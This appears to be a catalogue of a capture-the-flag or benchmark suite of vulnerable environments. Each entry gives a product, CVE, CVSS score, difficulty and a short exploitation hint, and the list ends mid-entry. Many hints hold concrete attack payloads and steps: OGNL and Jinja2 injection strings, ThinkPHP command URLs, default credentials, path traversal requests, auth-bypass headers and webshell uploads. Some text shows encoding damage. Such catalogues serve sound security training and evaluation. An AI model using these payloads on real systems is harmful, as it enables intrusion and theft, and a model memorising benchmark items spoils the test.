spring/CVE-2018-1270
CVSS 9.8
MEDIUM
RCE
π
file
Spring Framework RCE via STOMP messaging over WebSocket. Inject SpEL expression in Message header subscription selector to execute OS commands.
Spring Data Commons
CVE-2018-1273
spring/CVE-2018-1273
CVSS 9.8
EASY
RCE
π
file
Spring Data Commons RCE via SpEL injection in property path. Send POST with T(java.lang.Runtime).getRuntime().exec() in property binding expressions.
Spring Cloud Gateway
CVE-2022-22947
spring/CVE-2022-22947
CVSS 10.0
MEDIUM
RCE
π
file
Spring Cloud Gateway SSRF/RCE via Actuator API. Add malicious route via POST /actuator/gateway/routes with AddResponseHeader filter containing SpEL expression for RCE.
Spring Cloud Function
CVE-2022-22963
spring/CVE-2022-22963
CVSS 9.8
EASY
RCE
π
file
Spring Cloud Function SpEL injection via spring.cloud.function.routing-expression header. Send crafted HTTP request with SpEL in header to execute OS commands.
Spring
CVE-2022-22965
spring/CVE-2022-22965
CVSS 9.8
MEDIUM
RCE
π
file
Spring4Shell: RCE via data binding on class.module.classLoader. Bind ClassLoader properties to modify Tomcat log settings and write JSP webshell to server.
Apache Struts2
β
struts2/s2-001
CVSS 9.8
EASY
RCE
π
file
Struts2 OGNL injection in error message via %{expr} in form field. Submit %{@java.lang.Runtime@getRuntime().exec('cat /flag_proof')} in username field for RCE.
Apache Struts2
CVE-2010-1870
struts2/s2-005
CVSS 9.8
EASY
RCE
π
file
Struts2 OGNL remote code execution via parameters interceptor. Inject (#_memberAccess['allowStaticMethodAccess']=true)(exec command) in HTTP parameters.
Apache Struts2
β
struts2/s2-007
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 OGNL injection via invalid conversion. Trigger type conversion error with OGNL expression in parameter value to execute arbitrary Java code.
Apache Struts2
CVE-2012-0391
struts2/s2-008
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 devMode RCE via OGNL debug parameter. Access debug=command&expression=<ognl> parameter in devMode to execute arbitrary expressions.
Apache Struts2
CVE-2011-3923
struts2/s2-009
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 OGNL bypass via action chain. Use ognl.OgnlContext#DEFAULT_MEMBER_ACCESS to bypass security manager and execute OS commands via Java runtime.
Apache Struts2
CVE-2013-1965
struts2/s2-012
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 redirect action RCE via OGNL in redirect URL. Inject OGNL expression in redirect:${expression} action result URL for code execution.
Apache Struts2
CVE-2013-1966
struts2/s2-013
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 includeParams OGNL injection via URL/anchor tags. Inject OGNL via ${expr} in action attribute of s:url or s:a tags with includeParams=all.
Apache Struts2
['CVE-2013-2134', 'CVE-2013-2135']
struts2/s2-015
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 wildcard result OGNL injection. Map wildcard action to OGNL expression in result name Γ’β¬β trigger via URL containing crafted OGNL payload in path.
Apache Struts2
CVE-2013-2251
struts2/s2-016
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 action prefix OGNL injection via redirect: prefix. Append redirect:${#context['xwork.MethodAccessor.denyMethodExecution']=false,...} to URL for RCE.
Apache Struts2
CVE-2016-3081
struts2/s2-032
CVSS 9.8
HARD
RCE
π
file
Struts2 Dynamic Method Invocation RCE via method prefix. Use method:OGNL_EXPR to invoke arbitrary methods when DMI is enabled in struts.xml.
Apache Struts2
CVE-2017-5638
struts2/s2-045
CVSS 10.0
EASY
RCE
π
file
Struts2 Jakarta multipart parser RCE via Content-Type header OGNL. Send multipart POST with OGNL expression in Content-Type header for unauthenticated RCE.
Apache Struts2
CVE-2017-5638
struts2/s2-046
CVSS 10.0
EASY
RCE
π
file
Struts2 Content-Disposition OGNL injection similar to S2-045. Inject OGNL in filename field of multipart upload Content-Disposition header for RCE.
Apache Struts2
CVE-2017-9791
struts2/s2-048
CVSS 9.3
MEDIUM
RCE
π
file
Struts2 Struts 1 plugin OGNL injection via ActionMessage. Inject OGNL in message parameter of Struts 1 integration plugin for remote code execution.
Apache Struts2
CVE-2017-9805
struts2/s2-052
CVSS 9.8
HARD
RCE
π
file
Struts2 REST plugin XStream deserialization RCE. Send crafted XML payload to REST endpoint with Content-Type: application/xml to trigger XStream deserialization.
Apache Struts2
CVE-2017-12611
struts2/s2-053
CVSS 9.8
HARD
RCE
π
file
Struts2 Freemarker tag OGNL injection via FreeMarker templates. Inject OGNL expression in Freemarker template attribute ${(#_memberAccess...) } for code execution.
Apache Struts2
CVE-2018-11776
struts2/s2-057
CVSS 9.8
HARD
RCE
π
file
Struts2 namespace OGNL injection when namespace is not set and action is empty string. Inject OGNL via namespace in URL for RCE without prior authentication.
Apache Struts2
CVE-2019-0230
struts2/s2-059
CVSS 9.8
HARD
RCE
π
file
Struts2 OGNL injection via id attribute in UI tags. Inject OGNL expression in id attribute of s:url tag when evaluated as OGNL expression due to forced evaluation.
Apache Struts2
CVE-2020-17530
struts2/s2-061
CVSS 9.8
HARD
RCE
π
file
Struts2 OGNL sandbox bypass (S2-061). Use (#context=#attr['struts.valueStack'].context) bypass chain to escape OGNL sandbox and execute OS commands.
Apache Superset
CVE-2023-37941
superset/CVE-2023-37941
CVSS 9.8
HARD
RCE
π
file
Apache Superset RCE via Pickle deserialization in Celery task metadata. Craft malicious pickled object in task parameters to execute OS commands on Superset server.
Supervisor
CVE-2017-11610
supervisor/CVE-2017-11610
CVSS 9.8
EASY
RCE
π
file
Supervisor XML-RPC interface RCE via supervisord API. Call supervisor.supervisord.options.warnings.os.system('cmd') on exposed XML-RPC port 9001 without auth.
TeamCity
CVE-2023-42793
teamcity/CVE-2023-42793
CVSS 9.8
EASY
RCE
π
file
TeamCity authentication bypass via exposed REST API endpoints. Access /app/rest/users/id:1/tokens to create API token without authentication, then use token for RCE.
ThinkPHP
β
thinkphp/2-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 2.x RCE via URL routing code evaluation. Access /?s=index/think\app/invokefunction&function=system&vars[]=id to execute OS commands directly.
ThinkPHP
β
thinkphp/5-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 5.x RCE via _method parameter override. POST _method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=id to execute commands.
ThinkPHP
β
thinkphp/5.0.23-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 5.0.23 RCE via request method override. Exploit method=__construct to manipulate filter chain and execute system commands through controller invocation.
Apache Tomcat
CVE-2025-24813
tomcat/CVE-2025-24813
CVSS 9.8
HARD
RCE
π
file
Apache Tomcat partial PUT session deserialization RCE. Upload serialized Java payload via partial PUT request, trigger deserialization via session lookup for RCE.
Apache Unomi
CVE-2020-13942
unomi/CVE-2020-13942
CVSS 9.8
EASY
RCE
π
file
Apache Unomi MVEL/OGNL injection via crafted event payload. POST to /context.json with MVEL expression in condition script for unauthenticated RCE on CDP server.
WebLogic
CVE-2017-10271
weblogic/CVE-2017-10271
CVSS 9.8
EASY
RCE
π
file
Oracle WebLogic WLS-WebServices component deserialization RCE. POST crafted XMLDecoder payload to /wls-wsat/CoordinatorPortType11 for unauthenticated RCE.
WebLogic
CVE-2018-2628
weblogic/CVE-2018-2628
CVSS 9.8
MEDIUM
RCE
π
file
Oracle WebLogic T3 protocol deserialization RCE. Send crafted T3 handshake with malicious serialized Java object to port 7001 to execute OS commands.
WebLogic
CVE-2020-14882
weblogic/CVE-2020-14882
CVSS 9.8
EASY
RCE
π
file
Oracle WebLogic Console authentication bypass via URL override. Access /console/css/%252e%252e%252fconsole.portal to bypass authentication and access admin functions.
WebLogic
CVE-2023-21839
weblogic/CVE-2023-21839
CVSS 7.5
MEDIUM
RCE
π
file
Oracle WebLogic LDAP injection via OracleTextConnection. Bind malicious JNDI/LDAP URL to trigger LDAP lookup and achieve SSRF or remote class loading.
WebLogic
β
weblogic/weak_password
CVSS 9.8
EASY
RCE
π
file
WebLogic console accessible with default credentials (weblogic:weblogic1 or weblogic:Oracle@123). Login to /console, deploy malicious WAR to achieve RCE.
Webmin
CVE-2019-15107
webmin/CVE-2019-15107
CVSS 10.0
EASY
RCE
π
file
Webmin 1.920 pre-auth RCE via password_change.cgi exploit. Send crafted POST with pipe metacharacters in old password field to execute OS commands without authentication.
Wordpress
β
wordpress/pwnscriptum
CVSS 9.8
HARD
RCE
π
file
WordPress + PHPMailer RCE via crafted email in registration. Register with malicious email containing shell metacharacters that get passed to sendmail for command execution.
XStream
CVE-2021-21351
xstream/CVE-2021-21351
CVSS 9.8
HARD
RCE
π
file
XStream deserialization RCE via Groovy closure. Craft XML payload using com.thoughtworks.xstream.converters.collections.TreeMapConverter to execute Groovy scripts.
XStream
CVE-2021-29505
xstream/CVE-2021-29505
CVSS 9.8
HARD
RCE
π
file
XStream server-side forgery via JMX invocation. Deserialize crafted XStream XML that triggers JMX MBean invocation to execute OS commands on server.
YApi
β
yapi/unacc
CVSS 9.8
EASY
RCE
π
file
YApi unauthenticated access and RCE via mock scripts. Register account, create project, add mock script with require('child_process').execSync('cmd') for RCE.
Zabbix
CVE-2017-2824
zabbix/CVE-2017-2824
CVSS 9.8
MEDIUM
RCE
π
file
Zabbix trapper command injection via active agent registration. Send crafted auto-registration request to Zabbix server trapper port 10051 to execute OS commands.
Zabbix
CVE-2020-11800
zabbix/CVE-2020-11800
CVSS 9.8
HARD
RCE
π
file
Zabbix active agent trapper integer overflow RCE. Send crafted active check response to Zabbix server trapper to trigger buffer overflow and execute shellcode.
Apache ActiveMQ
CVE-2015-5254
activemq/CVE-2015-5254
CVSS 7.5
MEDIUM
DESERIALIZATION
π
file
Send crafted JMS ObjectMessage to ActiveMQ broker containing Commons-Collections gadget chain. Broker deserializes unauthenticated payload and executes OS command.
Celery
β
celery/celery3_redis_unauth
CVSS 9.8
EASY
DESERIALIZATION
π
file
Unauthenticated Redis broker used by Celery allows injecting arbitrary serialized task payloads. Celery worker deserializes and executes the malicious task.
Adobe ColdFusion
CVE-2017-3066
coldfusion/CVE-2017-3066
CVSS 10.0
HARD
DESERIALIZATION
π
file
Java deserialization via ColdFusion AMF endpoint. Send crafted AMF3 payload with gadget chain to the /flex2gateway/amf endpoint for unauthenticated RCE.
Apache Dubbo
CVE-2019-17564
dubbo/CVE-2019-17564
CVSS 9.8
HARD
DESERIALIZATION
π
file
Java deserialization in Apache Dubbo HTTP provider via crafted POST to exposed HTTP endpoint. Commons-Collections gadget chain executes OS commands.
Joomla
CVE-2015-8562
joomla/CVE-2015-8562
CVSS 7.5
MEDIUM
DESERIALIZATION
π
file
PHP object injection via HTTP User-Agent/X-Forwarded-For in Joomla session handler. Craft serialized PHP payload to execute OS commands.
Mojarra JSF
β
mojarra/jsf-viewstate-deserialization
CVSS 9.8
HARD
DESERIALIZATION
π
file
Apache Mojarra JSF ViewState Java deserialization. Craft malicious serialized ViewState payload using ysoserial to execute OS commands and read flag.
Neo4j
CVE-2021-34371
neo4j/CVE-2021-34371
CVSS 9.8
HARD
DESERIALIZATION
π
file
Neo4j 3.4 RMI deserialization via exposed RMI registry. Send crafted serialized payload to port 7474 RMI service using ysoserial CommonsCollections gadget.
Apache OFBiz
CVE-2023-49070
ofbiz/CVE-2023-49070
CVSS 9.8
HARD
DESERIALIZATION
π
file
Apache OFBiz authentication bypass via Groovy script execution. Access /webtools/control/ProgramExport without auth to execute Groovy code and read flag file.
phpMyAdmin
β
phpmyadmin/WooYun-2016-199433
CVSS 9.8
MEDIUM
DESERIALIZATION
π₯
db
phpMyAdmin SQL injection via parameter in setup.php. Inject into database parameter to extract mysql credentials from information_schema.
1panel
CVE-2024-39907
1panel/CVE-2024-39907
CVSS 9.8
HARD
SQLI
π
file
SQL injection in 1Panel Linux panel allows unauthenticated RCE. Craft malicious SQL payload to write webshell via outfile, then execute commands.
Cacti
['CVE-2023-39361', 'CVE-2024-31459']
cacti/CVE-2023-39361
CVSS 9.8
HARD
SQLI
π
file
SQL injection in Cacti graph_view.php leads to RCE via stacked queries writing a PHP webshell to the web root.
CMS Made Simple
CVE-2019-9053
cmsms/CVE-2019-9053
CVSS 9.8
MEDIUM
SQLI
π₯
db
SQL injection in CMS Made Simple search module. Time-based blind injection via m1_idlist parameter extracts admin credentials.
Django
CVE-2019-14234
django/CVE-2019-14234
CVSS 9.8
HARD
SQLI
π₯
db
SQLi via JSONField key transform lookups. Parameter names not properly quoted allowing SQL injection through crafted ORM filter expressions.
Django
CVE-2020-9402
django/CVE-2020-9402
CVSS 8.8
MEDIUM
SQLI
π₯
db
SQLi in Django GIS database functions. Craft malicious geometry to inject SQL via GEOSGeomFromWKB and extract database contents.
Django
CVE-2021-35042
django/CVE-2021-35042
CVSS 9.8
HARD
SQLI
π₯
db
Inject SQL via QuerySet.order_by() annotation with user-controlled input. Bypasses Django ORM escaping to execute arbitrary SQL.
Django
CVE-2022-34265
django/CVE-2022-34265
CVSS 9.8
HARD
SQLI
π₯
db
SQLi via Trunc()/Extract() when user-controlled kind parameter flows without validation. Bypasses Django ORM quoting mechanism.
Drupal
CVE-2014-3704
drupal/CVE-2014-3704
CVSS 7.5
EASY
SQLI
π₯
db
SQL injection via array parameter in Drupal DB API without authentication. Extract admin password hash from users table.
ECshop
β
ecshop/collection_list-sqli
CVSS 9.8
EASY
SQLI
π₯
db
SQL injection in ECShop collection_list.php via id parameter. Extract admin credentials from database without authentication.
ECshop
β
ecshop/xianzhi-2017-02-82239600
CVSS 9.8
MEDIUM
SQLI
π
file
Remote code execution in ECShop via template injection in ECSHOP_USER_INFO cookie. Inject PHP code that gets evaluated in template rendering.
GeoServer
CVE-2023-25157
geoserver/CVE-2023-25157
CVSS 9.8
HARD
SQLI
π₯
db
SQL injection in GeoServer OGC filter property name. Craft property containing SQL payload to execute arbitrary SQL against the spatial database backend.
Joomla
CVE-2017-8917
joomla/CVE-2017-8917
CVSS 9.8
MEDIUM
SQLI
π₯
db
SQL injection in Joomla com_fields via list[fullordering] parameter. No auth required. UNION-based extraction of admin credentials.
Magento
β
magento/2.2-sqli
CVSS 7.5
HARD
SQLI
π₯
db
Blind SQL injection in Magento REST API product filter parameter. No auth required. Time-based injection extracts admin password hash.
MeterSphere
CVE-2021-45788
metersphere/CVE-2021-45788
CVSS 9.8
HARD
SQLI
π
file
Remote code execution in MeterSphere via Freemarker template injection in test script. Inject template directives to execute OS commands and read flag.
Rocket.Chat
CVE-2021-22911
rocketchat/CVE-2021-22911
CVSS 9.8
HARD
SQLI
π
file
Rocket.Chat NoSQL injection in password reset allows admin account takeover. Inject {$gt: ''} in token field to bypass password reset validation and reset admin password.
ShowDoc
β
showdoc/3.2.5-sqli
CVSS 7.5
MEDIUM
SQLI
π₯
db
SQL injection in ShowDoc 3.2.5 via item_id parameter. Inject UNION SELECT payload to extract admin credentials from the members table.
Apache SkyWalking
β
skywalking/8.3.0-sqli
CVSS 9.8
HARD
SQLI
π₯
db
Apache SkyWalking GraphQL SQL injection. Inject malicious GraphQL query via /graphql endpoint to extract data from H2 database used by SkyWalking OAP server.
ThinkPHP
β
thinkphp/in-sqlinjection
CVSS 9.8
MEDIUM
SQLI
π₯
db
ThinkPHP SQL injection via IN operator array parameter. Inject array payload in where conditions to perform blind SQL injection and extract database contents.
YApi
β
yapi/mongodb-inj
CVSS 9.8
HARD
SQLI
π₯
db
YApi MongoDB injection via mock script. Inject MongoDB operator in JSON schema mock to extract user data from MongoDB without authentication.
Zabbix
CVE-2016-10134
zabbix/CVE-2016-10134
CVSS 9.8
EASY
SQLI
π₯
db
Zabbix SQL injection in latest.php via toggle_ids parameter. Inject UNION SELECT to extract admin session tokens and MD5 passwords from Zabbix database.
Adminer
CVE-2021-21311
adminer/CVE-2021-21311
CVSS 9.8
MEDIUM
SSRF
π
file
Open redirect in Adminer allows phishing via crafted server parameter. Combine with SSRF to probe internal services and extract credentials.
Apache CXF
CVE-2024-28752
apache-cxf/CVE-2024-28752
CVSS 7.5
MEDIUM
SSRF
π
file
SSRF in Apache CXF MTOM attachment processing allows server-side request to internal services via crafted multipart message.
GeoServer
CVE-2021-40822
geoserver/CVE-2021-40822
CVSS 7.5
EASY
SSRF
π₯
service
SSRF in GeoServer OWS API via crafted service URL. Server fetches attacker-specified URL enabling internal network scanning.
Grafana
β
grafana/admin-ssrf
CVSS 7.5
EASY
SSRF
π₯
service
Exploit Grafana datasource proxy without auth to perform SSRF. Reach internal flag_validator or admin-only metadata endpoints.
Apache HTTP Server
CVE-2021-40438
httpd/CVE-2021-40438
CVSS 9.0
MEDIUM
SSRF
π₯
service
mod_proxy SSRF: craft request with unix:// or http:// URI targeting internal backend to bypass origin restrictions and reach internal services.
WebLogic
β
weblogic/ssrf
CVSS 7.5
MEDIUM
SSRF
π₯
env
WebLogic UDDI registry SSRF via crafted SOAP request. Send SOAP to /uddiexplorer/SearchPublicRegistries.jsp to probe internal services and extract credentials.
PHP
β
php/php_xxe
CVSS 7.5
MEDIUM
XXE
π
file
PHP XXE via SimpleXML parsing of user-supplied XML. Inject external entity declaration to read /flag_proof from server filesystem via XML parsing.
Apache Solr
CVE-2017-12629
solr/CVE-2017-12629-XXE
CVSS 7.5
EASY
XXE
π
file
Apache Solr XXE in XML query parsing. Send crafted XML query with external entity to /solr/collection/select to read /flag_proof from server filesystem.
Apache Airflow
CVE-2020-17526
airflow/CVE-2020-17526
CVSS 7.5
EASY
AUTH BYPASS
π
file
Bypass Airflow authentication via JWT secret misconfiguration or default secret to forge admin session and access DAGs.
AppWeb
CVE-2018-8715
appweb/CVE-2018-8715
CVSS 7.5
EASY
AUTH BYPASS
π
file
Bypass HTTP digest authentication in Appweb by omitting Authorization header on digest-only routes. Access admin endpoints without credentials.
Budibase
CVE-2026-31816
budibase/CVE-2026-31816
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Authentication bypass in Budibase via forged JWT or API key exposure allows admin access and server-side JS execution for RCE.
Confluence
CVE-2023-22515
confluence/CVE-2023-22515
CVSS 10.0
HARD
AUTH BYPASS
π
file
Broken access control allows unauthenticated POST to /setup/setupadministrator.action. Create admin account then use console for RCE via template injection.
Apache CouchDB
CVE-2017-12635
couchdb/CVE-2017-12635
CVSS 9.8
EASY
AUTH BYPASS
π₯
db
CouchDB JSON/Erlang parser inconsistency: PUT user doc with duplicate 'roles' key creates admin unauthenticated. Exploit role escalation.
Gogs
CVE-2018-18925
gogs/CVE-2018-18925
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Forge Gogs remember-me cookie using known user ID. Craft signed cookie to authenticate as admin. Chain with Git hooks for arbitrary command execution.
Apache HugeGraph
CVE-2024-43441
hugegraph/CVE-2024-43441
CVSS 9.8
EASY
AUTH BYPASS
π
file
Authentication bypass in HugeGraph REST API. Unauthenticated access to admin endpoints allows user creation and Gremlin RCE via API.
GNU InetUtils
CVE-2026-24061
inetutils/CVE-2026-24061
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Buffer overflow or auth bypass in inetutils ftpd/telnetd. Exploit to gain unauthenticated shell access and read /flag_proof.
InfluxDB
CVE-2019-20933
influxdb/CVE-2019-20933
CVSS 9.8
MEDIUM
AUTH BYPASS
π₯
db
InfluxDB accepts JWT signed with empty secret. Craft valid JWT with empty secret and any username to gain admin access to all databases.
Joomla
CVE-2023-23752
joomla/CVE-2023-23752
CVSS 7.5
EASY
AUTH BYPASS
π₯
db
Improper access check on Joomla REST API returns database credentials in plaintext to unauthenticated requests.
Jumpserver
CVE-2023-42820
jumpserver/CVE-2023-42820
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Authentication bypass in JumpServer via forged JWT or HMAC bypass. Access admin endpoints to create new privileged sessions or execute commands.
Jupyter
β
jupyter/notebook-rce
CVSS 10.0
EASY
AUTH BYPASS
π
file
Unauthenticated Jupyter Notebook server. Create notebook, execute Python cell: open('/flag_proof').read() or subprocess.check_output(['cat','/flag_proof']).
LibSSH
CVE-2018-10933
libssh/CVE-2018-10933
CVSS 9.8
EASY
AUTH BYPASS
π
file
Authentication bypass in libssh server: send SSH2_MSG_USERAUTH_SUCCESS before authentication request. Server accepts connection as authenticated.
MySQL
CVE-2012-2122
mysql/CVE-2012-2122
CVSS 7.8
MEDIUM
AUTH BYPASS
π₯
db
MySQL authentication bypass via timing attack on password comparison. Repeatedly attempt login with any password Γ’β¬β ~1 in 256 attempts succeeds due to memcmp bug.
Nacos
CVE-2021-29441
nacos/CVE-2021-29441
CVSS 9.8
EASY
AUTH BYPASS
π
file
Nacos authentication bypass via User-Agent: Nacos-Server header. Access protected /nacos/v1/auth/users endpoint to add admin user, then exploit further to get RCE.
Next.js
CVE-2025-29927
next.js/CVE-2025-29927
CVSS 9.8
INSANE
AUTH BYPASS
π
file
Next.js middleware auth bypass via x-middleware-subrequest header. Set header to skip middleware execution and access protected routes without authentication.
ntopng
CVE-2021-28073
ntopng/CVE-2021-28073
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
ntopng authentication bypass via password reset without old password verification. Reset admin password directly via API without authentication token.
Openfire
CVE-2023-32315
openfire/CVE-2023-32315
CVSS 9.8
EASY
AUTH BYPASS
π
file
Openfire path traversal in admin console allows unauthenticated access. Navigate to setup-completed bypassed pages to create admin account and achieve RCE via plugin upload.
rsync
β
rsync/common
CVSS 9.8
EASY
AUTH BYPASS
π
file
rsync daemon unauthenticated access to exposed modules. Connect with rsync --list-only rsync://target/ to discover modules, then rsync rsync://target/module/ to download all files including flag.
Scrapyd
β
scrapy/scrapyd-unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
Scrapyd unauthenticated access to management API. Deploy malicious Scrapy spider via POST /schedule.json to execute Python code on the server and read flag.
Apache Shiro
CVE-2010-3863
shiro/CVE-2010-3863
CVSS 7.5
EASY
AUTH BYPASS
π
file
Apache Shiro authentication bypass via path normalization. Add semicolon or dot-slash to bypass Shiro URL pattern matching: /admin;/index to access protected resources.
Apache Shiro
CVE-2020-1957
shiro/CVE-2020-1957
CVSS 7.5
MEDIUM
AUTH BYPASS
π
file
Apache Shiro authentication bypass via Spring MVC pattern mismatch. Access /admin/ vs Shiro's /admin pattern matching difference to bypass authentication.
Spring
CVE-2022-22978
spring/CVE-2022-22978
CVSS 9.8
HARD
AUTH BYPASS
π
file
Spring Security RegexRequestMatcher auth bypass via regex edge cases. URL-encode characters to bypass regex pattern matching and access protected endpoints.
Apache Superset
CVE-2023-27524
superset/CVE-2023-27524
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Apache Superset default SECRET_KEY allows session forgery. If using default SECRET_KEY (thisismysecretkey), forge admin Flask session cookie to access dashboard.
TeamCity
CVE-2024-27198
teamcity/CVE-2024-27198
CVSS 10.0
MEDIUM
AUTH BYPASS
π
file
TeamCity auth bypass via alternative path (/app/rest with jsessionId bypass). Combine with RCE via admin user creation to execute OS commands on build server.
Tiki Wiki
CVE-2020-15906
tikiwiki/CVE-2020-15906
CVSS 9.8
EASY
AUTH BYPASS
π
file
TikiWiki authentication bypass via empty password. In older versions, admin account with empty password hash allows login with any password Γ’β¬β brute force admin panel.
Apache Tomcat
CVE-2020-1938
tomcat/CVE-2020-1938
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Ghostcat: Apache JServ Protocol (AJP) file read/inclusion. Connect to AJP port 8009, request any file path to read including WEB-INF/web.xml and JSP execution.
Apache Tomcat
β
tomcat/tomcat8
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Apache Tomcat manager application with default credentials (tomcat:tomcat). Login to /manager/html, deploy malicious WAR file containing JSP webshell for RCE.
uWSGI
β
uwsgi/unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
uWSGI stats server unauthenticated access on port 1717. Connect to stats socket, enumerate workers, and exploit uWSGI magic variables to execute OS commands.
XXL-JOB
β
xxl-job/unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
XXL-JOB executor unauthenticated access on port 9999. POST to /run endpoint with malicious GLUE script (Java) or BEAN handler to execute arbitrary code.
Apache ActiveMQ
CVE-2016-3088
activemq/CVE-2016-3088
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Upload JSP webshell via HTTP PUT to ActiveMQ fileserver, then HTTP MOVE it into the admin web directory. Trigger execution via GET.
Aria2
β
aria2/rce
CVSS 9.8
EASY
COMMAND INJECTION
π
file
Unauthenticated RPC access to aria2c daemon allows adding download tasks with out-of-path file names to write arbitrary files (e.g. SSH authorized_keys).
CGI
CVE-2016-5385
cgi/CVE-2016-5385
CVSS 8.1
MEDIUM
COMMAND INJECTION
π
file
HTTP_PROXY env var injection via Proxy header in CGI scripts (HTTPoxy). Causes outbound requests to go through attacker-controlled proxy revealing internal traffic.
Drupal
CVE-2019-6341
drupal/CVE-2019-6341
CVSS 8.8
MEDIUM
COMMAND INJECTION
π
file
Open redirect via crafted file URL in Drupal. Chain with XSS to steal admin session or redirect to attacker-controlled site for credential harvesting.
ElasticSearch
β
elasticsearch/WooYun-2015-110216
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Groovy/MVEL RCE via Elasticsearch dynamic script execution. Unauthenticated search query with script that invokes Runtime.exec() for OS command execution.
n8n
CVE-2025-68613
n8n/CVE-2025-68613
CVSS 9.8
HARD
COMMAND INJECTION
π
file
Server-side request forgery and RCE in n8n workflow automation via malicious webhook node. Craft workflow that executes arbitrary commands via HTTP Request node with file:// scheme.
Apache RocketMQ
CVE-2023-37582
rocketmq/CVE-2023-37582
CVSS 9.8
HARD
COMMAND INJECTION
π
file
Apache RocketMQ NameServer RCE via unauthorized config update. Bypass authentication to update filterServerNums config and trigger remote command execution.
SaltStack
CVE-2020-11652
saltstack/CVE-2020-11652
CVSS 7.5
EASY
COMMAND INJECTION
π
file
SaltStack directory traversal in wheel module allows reading arbitrary files. Use wheel.fs.file.read with path traversal to read /etc/shadow or /flag_proof files.
Apache Tomcat
CVE-2017-12615
tomcat/CVE-2017-12615
CVSS 9.8
EASY
COMMAND INJECTION
π
file
Apache Tomcat arbitrary file upload via PUT method when readonly=false. PUT /webshell.jsp/ with JSP payload to deploy webshell and execute OS commands.
WebLogic
CVE-2018-2894
weblogic/CVE-2018-2894
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Oracle WebLogic arbitrary file upload via development console. Upload JSP webshell through /ws_utc/begin.do endpoint when dev console is enabled on port 7001.
Jinja2
β
flask/ssti
CVSS 8.1
MEDIUM
SSTI
π
file
Server-Side Template Injection in Flask/Jinja2. Inject {{config.__class__.__init__.__globals__['os'].popen('cat /flag_proof').read()}} in vulnerable template parameter.
Jira
CVE-2019-11581
jira/CVE-2019-11581
CVSS 9.8
HARD
SSTI
π₯
service
SSRF in Jira ContactAdministrators action. Inject FreeMarker template in email subject for RCE, or use SSRF to reach internal-only services.
Adminer
CVE-2021-43008
adminer/CVE-2021-43008
CVSS 9.8
HARD
PATH TRAVERSAL
π₯
db
Adminer 4.6.2 file disclosure via SSRF to local MySQL. Connect to attacker-controlled MySQL server to read arbitrary files from the target.
Adobe ColdFusion
CVE-2010-2861
coldfusion/CVE-2010-2861
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Directory traversal via locale parameter in ColdFusion admin. Request /CFIDE/administrator/enter.cfm?locale=../../flag_proof to read arbitrary files.
ElasticSearch
CVE-2015-3337
elasticsearch/CVE-2015-3337
CVSS 4.0
EASY
PATH TRAVERSAL
π
file
Path traversal in Elasticsearch site plugin via /_plugin/<name>/../../../etc/passwd. Read arbitrary files from server without authentication.
ElasticSearch
CVE-2015-5531
elasticsearch/CVE-2015-5531
CVSS 5.0
EASY
PATH TRAVERSAL
π
file
Directory traversal in Elasticsearch snapshot API via crafted repository path. Read arbitrary files from the Elasticsearch server filesystem.
FFmpeg
['CVE-2016-1897', 'CVE-2016-1898']
ffmpeg/CVE-2016-1897
CVSS 5.9
MEDIUM
PATH TRAVERSAL
π
file
SSRF via crafted HLS playlist in FFmpeg. Attacker-controlled m3u8 playlist with file:// or http:// URLs causes FFmpeg to fetch and embed internal file contents.
FFmpeg
CVE-2017-9993
ffmpeg/CVE-2017-9993
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Unsafe use of concat demuxer in FFmpeg allows reading local files via crafted playlist when processing untrusted video files.
Apache Flink
CVE-2020-17518
flink/CVE-2020-17518
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Upload arbitrary file via Flink REST API with path traversal in filename parameter to write outside designated upload directory. Chain with JAR execution for RCE.
Apache Flink
CVE-2020-17519
flink/CVE-2020-17519
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Unauthenticated path traversal via Flink REST: GET /jobmanager/logs/..%252F..%252F..%252Fflag_proof reads arbitrary files from JobManager filesystem.
GitLab
CVE-2016-9086
gitlab/CVE-2016-9086
CVSS 6.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in GitLab API export feature. Authenticated user downloads repository export with path traversal to read files outside the export directory.
GlassFish
CVE-2017-1000028
glassfish/CVE-2017-1000028
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
GlassFish 4.x path traversal via /../ sequences in URL allows reading arbitrary files. Navigate to /theme/META-INF/../../../flag_proof to extract flag.
Gradio
CVE-2023-51449
gradio/CVE-2023-51449
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in Gradio file serving endpoint. Request /file=../../../flag_proof to read arbitrary files from server without authentication.
Gradio
CVE-2024-1561
gradio/CVE-2024-1561
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Unauthenticated file read in Gradio via absolute path traversal in /file= endpoint. Access any file readable by the Gradio process.
Grafana
CVE-2021-43798
grafana/CVE-2021-43798
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal: GET /public/plugins/<plugin>/../../../etc/flag_proof. No authentication. Read any file accessible by grafana process.
Apache HTTP Server
CVE-2021-41773
httpd/CVE-2021-41773
